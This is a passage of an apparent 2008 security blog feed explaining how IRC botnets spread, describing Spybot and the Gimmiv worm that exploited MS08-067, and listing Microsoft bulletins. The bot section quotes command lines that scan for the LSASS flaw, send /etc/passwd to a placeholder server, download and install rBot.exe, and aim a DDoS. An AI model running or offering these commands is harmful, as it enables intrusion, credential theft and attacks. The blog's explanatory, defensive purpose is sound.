normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;The bot receives the topic of the channel and interprets it as a command&lt;/font&gt;&lt;/p&gt;  &lt;p style="margin-left: 1in; text-indent: -0.25in;"&gt;&lt;font size="1"&gt;&lt;span&gt;&lt;span&gt;–&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&amp;lt;- :irc1.XXXXXX.XXX 332 [urX]-700159 #foobar :.advscan lsass 200 5 0 -r –s&lt;/font&gt;&lt;/p&gt;  &lt;p style="margin-left: 1in; text-indent: -0.25in;"&gt;&lt;font size="1"&gt;&lt;span&gt;&lt;span&gt;–&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&amp;lt;- :[urX]-700159!mltfvt@nicetry JOIN :#foobar &lt;/font&gt;&lt;/p&gt;  &lt;p style="margin-left: 1in; text-indent: -0.25in;"&gt;&lt;font size="1"&gt;&lt;span&gt;&lt;span&gt;–&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&amp;lt;- :irc1.XXXXXX.XXX MODE #foobar +smntuk channelpassword &lt;/font&gt;&lt;/p&gt;  &lt;p&gt;&lt;font size="1"&gt;eg:&lt;/font&gt;&lt;/p&gt;  &lt;p style="margin-left: 1in; text-indent: -0.25in;"&gt;&lt;font size="1"&gt;&lt;span&gt;&lt;span&gt;–&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&amp;quot;.cp /etc/passwd http://&amp;lt;server&amp;gt;/mybot/&amp;quot; &lt;/font&gt;&lt;/p&gt;  &lt;p style="margin-left: 1in; text-indent: -0.25in;"&gt;&lt;font size="1"&gt;&lt;span&gt;&lt;span&gt;–&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&amp;quot;.http.update http://&amp;lt;server&amp;gt;/~mugenxu/rBot.exe c:\msy32awds.exe 1&amp;quot;&lt;/font&gt;&lt;/p&gt;  &lt;p style="margin-left: 1in; text-indent: -0.25in;"&gt;&lt;font size="1"&gt;&lt;span&gt;&lt;span&gt;–&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;:.http://&amp;lt;target-server-for-DDOS&amp;gt; &lt;/font&gt;&lt;/p&gt;  &lt;p&gt;&lt;font size="1"&gt;&lt;b&gt;&lt;u&gt;Example: SPYBOT&lt;/u&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;  &lt;p&gt;&lt;font size="1"&gt;This particular bot spreads through open or weak network shares, P2P networks. After exploitation it tries to copy itself as &lt;b&gt;&lt;span style="font-size: 10pt; line-height: 115%;"&gt;%Windir%\wscntify.exe &lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 10pt; line-height: 115%;"&gt;and the registers itself with the following parameters.&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;  &lt;p&gt;&lt;font size="1"&gt;&lt;b&gt;&lt;span style="font-size: 10pt; line-height: 115%;"&gt;Service Name:&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 10pt; line-height: 115%;"&gt; windows security centre&lt;br&gt; &lt;b&gt;Display Name:&lt;/b&gt; security centre&lt;br&gt; &lt;b&gt;Image Path:&lt;/b&gt; %Windir%\wscntify.exe&lt;br&gt; &lt;b&gt;Description:&lt;/b&gt; security&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;  &lt;p style="margin-left: 0.5in; text-indent: -0.25in;"&gt;&lt;font size="1"&gt;&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;;"&gt;&lt;span&gt;•&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;Common filenames used by Spybot include:&lt;/font&gt;&lt;/p&gt;  &lt;p style="margin: 0in 0in 0.0001pt 1in; text-indent: -0.25in;"&gt;&lt;font size="1"&gt;&lt;span&gt;&lt;span&gt;–&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;Bling.exe&lt;/font&gt;&lt;/p&gt;    &lt;p style="margin: 0in 0in 0.0001pt 1in; text-indent: -0.25in;"&gt;&lt;font size="1"&gt;&lt;span&gt;&lt;span&gt;–&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;Netwmon.exe&lt;/font&gt;&lt;/p&gt;    &lt;p style="margin: 0in 0in 0.0001pt 1in; text-indent: -0.25in;"&gt;&lt;font size="1"&gt;&lt;span&gt;&lt;span&gt;–&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;Wuamgrd.exe&lt;/font&gt;&lt;/p&gt;    &lt;p&gt;&lt;font size="1"&gt;For further details and references kindly visit the following links&lt;/font&gt;&lt;/p&gt;  &lt;p&gt;&lt;font size="1"&gt;&lt;a href="http://www.honeynet.org/papers/bots/" target="_blank"&gt;http://www.honeynet.org/papers/bots/&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;  &lt;p&gt;&lt;font size="1"&gt;&lt;a href="http://www.symantec.com/security_response/writeup.jsp?docid=2006-030315-2548-99&amp;amp;tabid=2" target="_blank"&gt;http://www.symantec.com/security_response/writeup.jsp?docid=2006-030315-2548-99&amp;amp;tabid=2&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;    &lt;p&gt;&lt;font size="1"&gt;&lt;a href="http://www.ca.com/us/securityadvisor/virusinfo/virus.aspx?id=35771" target="_blank"&gt;http://www.ca.com/us/securityadvisor/virusinfo/virus.aspx?id=35771&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;  &lt;p&gt;&lt;font size="1"&gt;I have also tried to search for few good video on botnet, here is the link for viewing them&lt;/font&gt;&lt;/p&gt;  &lt;p&gt;&lt;font size="1"&gt;&lt;span style="font-size: 9pt; line-height: 115%;"&gt;&lt;a href="http://www.watchguard.com/education/video/play.asp?vid=botnets1" target="_blank"&gt;http://www.watchguard.com/education/video/play.asp?vid=botnets1&lt;/a&gt;&lt;br&gt;   &lt;a href="http://www.watchguard.com/education/video/play.asp?vid=botnets2" target="_blank"&gt;http://www.watchguard.com/education/video/play.asp?vid=botnets2&lt;/a&gt;&lt;br&gt; &lt;a href="http://www.watchguard.com/education/video/play.asp?vid=botnets3" target="_blank"&gt;http://www.watchguard.com/education/video/play.asp?vid=botnets3&lt;/a&gt;&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;  &lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-875529254633242445?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/875529254633242445/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=875529254633242445' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/875529254633242445'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/875529254633242445'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/11/how-bots-are-spread_3465.html' title='How the Bots Are spread'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-1550612863674505020</id><published>2008-11-14T02:24:00.001-08:00</published><updated>2008-11-14T02:25:12.856-08:00</updated><title type='text'>New Microsoft Security Bulletins Released</title><content type='html'>Microsoft has released 2 new security bulletins.&lt;br /&gt;&lt;div class="gmail_quote"&gt;&lt;br /&gt;&lt;br /&gt;MS08-068: Vulnerability in SMB Could Allow Remote Code Execution (957097)&lt;br /&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms08-068.mspx" target="_blank"&gt;http://www.microsoft.com/technet/security/bulletin/ms08-068.mspx&lt;/a&gt;&lt;br /&gt;Severity: Important&lt;br /&gt;&lt;br /&gt;MS08-069: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution (955218)&lt;br /&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms08-069.mspx" target="_blank"&gt;http://www.microsoft.com/technet/security/bulletin/ms08-069.mspx&lt;/a&gt;&lt;br /&gt;Severity: Critical&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-1550612863674505020?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/1550612863674505020/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=1550612863674505020' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/1550612863674505020'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/1550612863674505020'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/11/new-microsoft-security-bulletins.html' title='New Microsoft Security Bulletins Released'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-7993886437356467774</id><published>2008-11-13T23:25:00.001-08:00</published><updated>2008-11-14T01:52:35.878-08:00</updated><title type='text'>New Media Partner For Worms and Exploits Blog</title><content type='html'>Hi&lt;br /&gt;&lt;br /&gt;I am glad to announce that with in the 1st day of launch of this blog, it was identified by EvilFingers and they expressed to become the media partners for this Blog, which is really a great thing for this Blog to get attached with EvilFingers. (&lt;a href="http://www.evilfingers.com/"&gt;www.EvilFingers.com&lt;/a&gt;) &lt;br /&gt;--&lt;br /&gt;&lt;br /&gt;W &amp;amp; E&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-7993886437356467774?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/7993886437356467774/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=7993886437356467774' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/7993886437356467774'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/7993886437356467774'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/11/new-media-partner-for-worms-and.html' title='New Media Partner For Worms and Exploits Blog'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-5320421594333629146</id><published>2008-11-13T07:14:00.001-08:00</published><updated>2009-01-22T11:43:29.146-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='MS 08-067'/><category scheme='http://www.blogger.com/atom/ns#' term='microsoft ms 08067'/><category scheme='http://www.blogger.com/atom/ns#' term='ms 08-067 exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='MS 08067 virus'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnet'/><title type='text'>Gimmiv and MS-08-067</title><content type='html'>Recently the internet has witnessed as worm after the release of a emergency patch from Microsoft (MS-08067). I have tried to pull out few details from various sources for the viewers and put together for your use and information.&lt;br /&gt;&lt;br /&gt;Worm Detail : Win32/Gimmiv.A (&lt;a href="http://www.ca.com/us/securityadvisor/virusinfo/virus.aspx?id=74579#section1"&gt;CA&lt;/a&gt;), Trojan.Gimmiv.A (&lt;a href="http://www.symantec.com/security_response/writeup.jsp?docid=2008-102320-3122-99&amp;amp;tabid=3"&gt;Symantec&lt;/a&gt;)&lt;br /&gt;&lt;br /&gt;This worm used the above flaw to exploit the remote computers and then steal various information form it, like, Username, Hostname, IpConfig, Outlook info, information about the patches installed etc, . IT creates the following registry keys as well after a successful infection and drops a DLL to  %System%\wbem\sysmgr.dll&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BaseSvc\Parameters\"ServiceDll"= "%System%\winbase.dll"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BaseSvc\Parameters\"ServiceMain"= "ServiceMainFunc"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\"BaseSvc" = "BaseSvc"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;HKLM\SYSTEM\CurrentControlSet\Services\sysmgr&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;HKLM\SYSTEM\CurrentControlSet\Services\sysmgr\Parameters\ServiceDll=”%System%\wbem\sysmgr.dll"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;HKLM\SYSTEM\CurrentControlSet\Services\sysmgr\ImagePath = "%SystemRoot%\System32\svchost.exe -k sysmgr"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The remedial actions are already published in CA and Symantec websites.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ca.com/us/securityadvisor/virusinfo/virus.aspx?id=74579#section1"&gt;http://www.ca.com/us/securityadvisor/virusinfo/virus.aspx?id=74579#section1&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.symantec.com/security_response/writeup.jsp?docid=2008-102320-3122-99&amp;amp;tabid=3"&gt;http://www.symantec.com/security_response/writeup.jsp?docid=2008-102320-3122-99&amp;amp;tabid=3&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Following BID are available for further reading&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.securityfocus.com/bid/31874"&gt;http://www.securityfocus.com/bid/31874&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.securityfocus.com/bid/19409"&gt;http://www.securityfocus.com/bid/19409&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Reference URLs&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx"&gt;http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx"&gt;http://www.computerworld.com/action/article.do?command=viewArticleBasic&amp;amp;articleId=9118100&amp;amp;source=rss_topic145&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://blog.threatexpert.com/2008/10/gimmiva-exploits-zero-day-vulnerability.html"&gt;http://blog.threatexpert.com/2008/10/gimmiva-exploits-zero-day-vulnerability.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36809"&gt;http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36809&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://it.toolbox.com/blogs/talk-to-the-hand/gimmiv-worm-feeds-on-latest-microsoft-bug-27955"&gt;http://it.toolbox.com/blogs/talk-to-the-hand/gimmiv-worm-feeds-on-latest-microsoft-bug-27955&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-5320421594333629146?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/5320421594333629146/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=5320421594333629146' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/5320421594333629146'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/5320421594333629146'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/11/gimmiv-and-ms-08-067.html' title='Gimmiv and MS-08-067'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
